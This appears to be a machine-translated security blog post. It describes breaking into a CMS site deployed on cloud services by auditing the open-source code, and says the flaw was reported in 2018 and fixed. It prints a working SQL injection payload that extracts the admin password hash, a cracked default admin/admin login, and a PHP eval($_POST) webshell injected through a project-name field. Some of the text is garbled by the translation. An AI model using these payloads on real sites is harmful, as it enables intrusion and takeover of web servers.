Strike up a conversation with a friend about the security implications of a server deployment architecture upgrade. From the simplest server, to application, database, file server separation; From local machine room server to cloud server product matrix; From virtualization to containerized deployment, there has been a shift toward greater security.
This article attempts to construct a scenario where the source code is placed in ECS, the database in RDS, and the unstructured data store in HDFS. The usual getShell methods, such as SQL injection write files, arbitrary file upload, file inclusion, and so on, no longer seem to work. In this case, how to break through the deployment architecture of the system to get the webshell of the website?
Black box penetration test + white box code audit
When collecting information, find the website management background, check the source code of the login page, and learn that the system may be developed by a CMS. Further download open source CMS source code for code audit, from the front SQL injection to the background getShell.
Vulnerability utilization process of a CMS demonstration site:
1. Use foreground SQL injection vulnerability to fill Pyload in search:
keyword=1%' or (select 1 from (select count(),concat((concat(0x5e5e21,(select concat(0x7c,password,0x7c) from xxxxx_user where uid=1),0x215e5e)),floor(rand(0)2))x from information_schema.tables group by x)a)#Copy the code
The md5 value: 21232 f297a57a5a743894a0e4a801fc3 decryption for admin
Successfully log in to the background using the weak password admin/admin.
Log in to the background, select Home > Project Management > Create project > Project name Payload: test111′,eval($_POST[g]),//
3. Access webshell address:
PS: In the case cited in this paper, the security vulnerability was submitted to the authorities in November 2018 and has been repaired.
With the upgrade of technical architecture, it can greatly reduce some security risks, and the vulnerability of black box penetration will undoubtedly become more difficult to use. At present, the popular microservice architecture, there will be more and more system use scenarios, and this is also a big challenge, you think you have access to the whole system, in fact, you may touch a service in the system.
I like this sentence very much. It is brief and enlightening: loopholes are found in details, problems are solved in architecture, and risks are controlled in process.